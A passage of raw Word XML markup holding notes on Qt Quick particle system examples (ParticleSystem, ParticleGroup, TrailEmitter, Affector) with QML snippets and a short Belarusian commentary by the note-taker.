        </w:rPr>
        <w:t>Note</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> how the Image objects are not able to be randomly colorized.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E27D73" w:rsidRDefault="00E27D73" w:rsidP="00E27D73">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B82D2D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Start and Stop</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> simply sets the running and paused states of a</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1846" w:history="1">
        <w:r w:rsidRPr="00E27D73">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ParticleSystem</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. While the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B82D2D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>system does not perform any simulation when stopped or paused</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, a </w:t>
      </w:r>
      <w:r w:rsidRPr="00B82D2D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>restart</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> restarts the simulation from the beginning, while </w:t>
      </w:r>
      <w:r w:rsidRPr="00B82D2D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>unpausing</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> resumes the simulation from where it was.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00412A62" w:rsidRDefault="00412A62" w:rsidP="00E27D73">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00412A62" w:rsidRPr="00E85C50" w:rsidRDefault="00E85C50" w:rsidP="00E27D73">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E85C50">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidR="00412A62" w:rsidRPr="00412A62">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>У гэтым прыкладзе мне зразумела, як выкарыстоўваецца сістэма часцінак (</w:t>
      </w:r>
      <w:hyperlink r:id="rId1847" w:history="1">
        <w:r w:rsidR="00412A62" w:rsidRPr="00412A62">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:i/>
            <w:highlight w:val="yellow"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>http://doc.qt.io/qt-5/qtquick-particles-system-content-dynamiccomparison-qml.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00412A62" w:rsidRPr="00412A62">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>). Ёсць бацькоўскі візуальны элемент (</w:t>
      </w:r>
      <w:r w:rsidR="00412A62" w:rsidRPr="00412A62">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Rectangle</w:t>
      </w:r>
      <w:r w:rsidR="00412A62" w:rsidRPr="00412A62">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">). Ён змяшчае элемент </w:t>
      </w:r>
      <w:r w:rsidR="00412A62" w:rsidRPr="00412A62">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ParticleSystem</w:t>
      </w:r>
      <w:r w:rsidR="00412A62" w:rsidRPr="00412A62">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> з </w:t>
      </w:r>
      <w:r w:rsidR="00412A62" w:rsidRPr="00412A62">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidR="00412A62" w:rsidRPr="00412A62">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00412A62" w:rsidRPr="00412A62">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sys</w:t>
      </w:r>
      <w:r w:rsidR="00412A62" w:rsidRPr="00412A62">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">. Далей ідзе </w:t>
      </w:r>
      <w:r w:rsidR="00412A62" w:rsidRPr="00412A62">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ImageParticle</w:t>
      </w:r>
      <w:r w:rsidR="00412A62" w:rsidRPr="00412A62">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> – часцінка-выява, якая задае выяву і пэўныя параметры. А таксама </w:t>
      </w:r>
      <w:r w:rsidR="00412A62" w:rsidRPr="00412A62">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Emitter</w:t>
      </w:r>
      <w:r w:rsidR="00412A62" w:rsidRPr="00412A62">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">. І лагічная часцінка, і эмітэр маюць уласцівасць </w:t>
      </w:r>
      <w:r w:rsidR="00412A62" w:rsidRPr="00412A62">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>system</w:t>
      </w:r>
      <w:r w:rsidR="00412A62" w:rsidRPr="00412A62">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00412A62" w:rsidRPr="00412A62">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sys</w:t>
      </w:r>
      <w:r w:rsidR="00412A62" w:rsidRPr="00412A62">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">. Выклікаючы метад </w:t>
      </w:r>
      <w:r w:rsidR="00412A62" w:rsidRPr="00412A62">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>emitter</w:t>
      </w:r>
      <w:r w:rsidR="00412A62" w:rsidRPr="00412A62">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00412A62" w:rsidRPr="00412A62">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>burst</w:t>
      </w:r>
      <w:r w:rsidR="00412A62" w:rsidRPr="00412A62">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">() у таймеры, мы запускаем сістэму часцінак. Паралельна з гэтым паказаны код таго, як можна праз сродкі </w:t>
      </w:r>
      <w:r w:rsidR="00412A62" w:rsidRPr="00412A62">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>qml</w:t>
      </w:r>
      <w:r w:rsidR="00412A62" w:rsidRPr="00412A62">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> дасягнуць падобнага эфекта.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00412A62" w:rsidRPr="00412A62" w:rsidRDefault="00412A62" w:rsidP="00E27D73">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E27D73" w:rsidRPr="00E27D73" w:rsidRDefault="00E27D73" w:rsidP="00E27D73">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E27D73">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Timed group changes is an example that highlights the</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1848" w:history="1">
        <w:r w:rsidRPr="00E27D73">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ParticleGroup</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type. While normally referring to groups with a string name is sufficient, additional effects can be done by setting properties on groups. The first group has a variable duration on it, but always transitions to the second group.</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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ParticleGroup</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name</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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"fire"</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duration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2000</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durationVariation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2000</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to</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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"splode"</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1</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Fonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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E27D73">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The second group has a</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1849" w:history="1">
        <w:r w:rsidRPr="00E27D73">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>TrailEmitter</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>on it, and a fixed duration for emitting into the third group. By placing the</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1850" w:history="1">
        <w:r w:rsidRPr="00E27D73">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>TrailEmitter</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>as a direct child of the</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1851" w:history="1">
        <w:r w:rsidRPr="00E27D73">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ParticleGroup</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, it automatically selects that group to follow.</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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ParticleGroup</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name</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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"splode"</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duration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400</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to</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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"dead"</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1</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TrailEmitter</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group</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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"works"</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emitRatePerParticle</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100</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lifeSpan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1000</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maximumEmitted</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1200</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size</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8</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velocity</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AngleDirection</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angle</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270</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angleVariation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45</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magnitude</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20</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magnitudeVariation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20</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acceleration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PointDirection</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y</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>100</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yVariation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20</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lastRenderedPageBreak/>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Fonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The third group has an </w:t>
      </w:r>
      <w:r w:rsidRPr="00B84995">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Affector as a direct child, which makes the affector automatically target this group</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. The affector means that as soon as particles enter this group, a burst function can be called on another emitter, using the x,y positions of this particle.</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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ParticleGroup</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name</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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"dead"</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duration</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1000</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Affector</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once</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true</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onAffected</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worksEmitter</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burst</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
